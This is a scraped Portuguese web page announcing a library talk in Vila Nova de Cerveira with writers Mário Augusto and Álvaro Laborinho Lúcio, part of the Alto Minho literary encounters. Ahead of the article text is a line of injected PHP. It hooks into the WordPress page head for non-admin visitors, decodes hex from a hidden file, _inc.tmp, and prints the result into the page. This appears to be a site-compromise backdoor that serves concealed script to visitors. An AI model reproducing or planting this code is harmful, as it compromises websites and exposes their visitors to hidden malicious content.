if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } «A Perspetiva de Quem Conta» - artesentreasletras.com.pt

«A Perspetiva de Quem Conta»

A Biblioteca Municipal de Vila Nova de Cerveira recebe dia 30 de abril, 16h30, duas personalidades literárias de referência nacional e internacional. A conversa com Mário Augusto e Álvaro Laborinho Lúcio sobre «A Perspetiva de Quem Conta» apresenta-se como uma oportunidade para o público interagir e conhecer estes dois escritores e marca o encerramento da programação cultural afeta à 31ª edição da Festa do Livro e da Leitura.
Este encontro literário é um dos 10 encontros literários promovidos no âmbito dos “Encontros Literários do Alto Minho: As palavras que nos unem”, organizados pela Comunidade Intermunicipal do Alto Minho (CIM Alto Minho), em colaboração com a RIBAM – Rede Intermunicipal das Bibliotecas Públicas Municipais do Alto Minho, e que vão percorrer as bibliotecas municipais do Alto Minho até outubro.